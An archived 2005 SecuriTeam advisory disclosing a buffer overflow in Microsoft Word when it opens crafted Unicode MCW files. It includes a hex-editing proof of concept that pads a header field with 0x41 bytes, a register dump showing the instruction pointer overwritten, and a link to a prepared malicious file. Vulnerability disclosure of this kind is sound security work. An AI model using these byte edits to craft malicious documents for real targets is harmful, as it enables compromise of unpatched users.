[NT] MS Word Unicode Buffer Overflow (MCW)
From: SecuriTeam (support_at_securiteam.com)
Date: 05/26/05
- Previous message: SecuriTeam: "[NEWS] Prestige 650R ADSL Router DoS"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 26 May 2005 18:20:00 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
MS Word Unicode Buffer Overflow (MCW)
------------------------------------------------------------------------
SUMMARY
Microsoft Word is "a word processor program from Microsoft. It was
originally written by Richard Brodie for IBM PC computers running DOS in
1983. Later versions were created for the Apple Macintosh (1984), SCO
UNIX, and Microsoft Windows (1989). It became part of the Microsoft Office
suite".
Microsoft Word is vulnerable to buffer overflow while opening maliciously
crafted Unicode MCW (Word for Macintosh Document) file.
DETAILS
Vulnerable Systems:
* Winword.exe version 10.2627.6714 and prior
Immune Systems:
* Microsoft Word 2002 Service Pack 3
The Unicode buffer overflow occurs when the user opens malformed MCW
document.
Proof of concept:
Modify the MCW file by using binary editor as follows, these lines were
taken from an MCW file:
c6 2e 82 05 a0 07 08 05 a0 07 08 00 00 02 d0 42
00 00 01 00 01 00 01 00 00 00 00 00 00 00 00 00
11 04 74 65 73 74 00 06 20 42 61 68 61 61 00 00
00 09 00 00 00 00 0f 54 69 6d 65 73 20 4e 65 77
Change them as follows:
c6 2e 82 05 a0 07 08 05 a0 07 08 00 00 02 d0 42
00 00 01 00 01 00 01 00 00 00 00 00 00 00 00 00
11 04 74 65 73 74 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 00 06 20 42 61 68
61 61 00 00 00 09 00 00 00 00 0f 54 69 6d 65 73
EAX = 00000000 EBX = 00000000 ECX = 00000006
EDX = 7C90EB94 ESI = 00000001 EDI = 001262B0
EIP = 00410041 ESP = 00126110 EBP = 00410041
EFL = 00000246
A modified MCW file can be downloaded from:
<http://study.haifa.ac.il/~bnaamnih/word/foo.mcw>
http://study.haifa.ac.il/~bnaamnih/word/foo.mcw
ADDITIONAL INFORMATION
The information has been provided by <mailto:b_naamneh@hotmail.com> Bahaa
Naamneh.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: SecuriTeam: "[NEWS] Prestige 650R ADSL Router DoS"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
